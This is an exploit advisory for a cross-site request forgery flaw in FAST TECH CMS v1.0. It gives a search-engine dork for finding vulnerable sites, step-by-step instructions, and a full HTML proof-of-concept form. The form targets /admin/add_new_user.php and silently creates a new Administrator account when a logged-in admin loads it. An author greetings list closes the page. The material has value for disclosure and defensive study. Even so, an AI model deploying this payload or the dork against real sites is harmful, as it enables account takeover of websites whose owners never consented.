Authored by indoushka

FAST TECH CMS version 1.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================
| # Title     : FAST TECH CMS v1.0 CSRF Vulnerability                                                                              |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit)                                             | 
| # Vendor    : http://www.fasttechtechnologies.in/                                                                                |  
| # Dork      : Designed & Developed by FAST TECH TECHNOLOGIES SERVICES PVT LTD . All rights reserved.                             |
====================================================================================================================================

poc :


[+] Dorking Ä°n Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 5.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/add_new_user.php

[+] save code as poc.html .

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<script data-ad-client="ca-pub-6966557515756083" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<form action="https://127.0.0.1/repairthikanacom/admin/add_new_user.php" method="post" name="newuserform" enctype="multipart/form-data">
              <div class="form-group">
          <label>Name</label>
                    <input type="text" class="form-control" id="name" name="name" placeholder="Enter Name ..." required>
              </div>
              <div class="form-group">
          <label>User Name</label>
                    <input type="text" class="form-control" id="username" name="username" placeholder="Enter User  Name ..." required>
              </div>
              
               <div class="form-group">
          <label>Password</label>
                    <input type="password" class="form-control" id="password" name="password" placeholder="Enter Password ..." required>
              </div>
              
              
               <div class="form-group">
          <label>Confirm Password</label>
                    <input type="password" class="form-control" id="confirmpassword" name="confirmpassword" placeholder="Enter Confirm Password ..." required>
              </div>
             
              
             <div class="form-group">
                    <label>User Type</label>
                    <select class="form-control" id="usertype" name="usertype" required>
                      <option>Select Type</option>
                      <option value="A">Administrator</option>
                      <option value="R">Retail</option>
                      
                    </select>
             </div>
             
              <div class="form-group">
          <label>Email-Id</label>
                    <input type="text" class="form-control" id="emailid" name="emailid" placeholder="Enter Email-Id ..." required>
              </div>
              
              <div class="box-footer">
                <button type="submit" class="btn btn-primary" name="submit">Submit</button>
              </div>
            </form>
            </div>
            
          </div>

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================

RELATED ARTICLESMORE FROM AUTHOR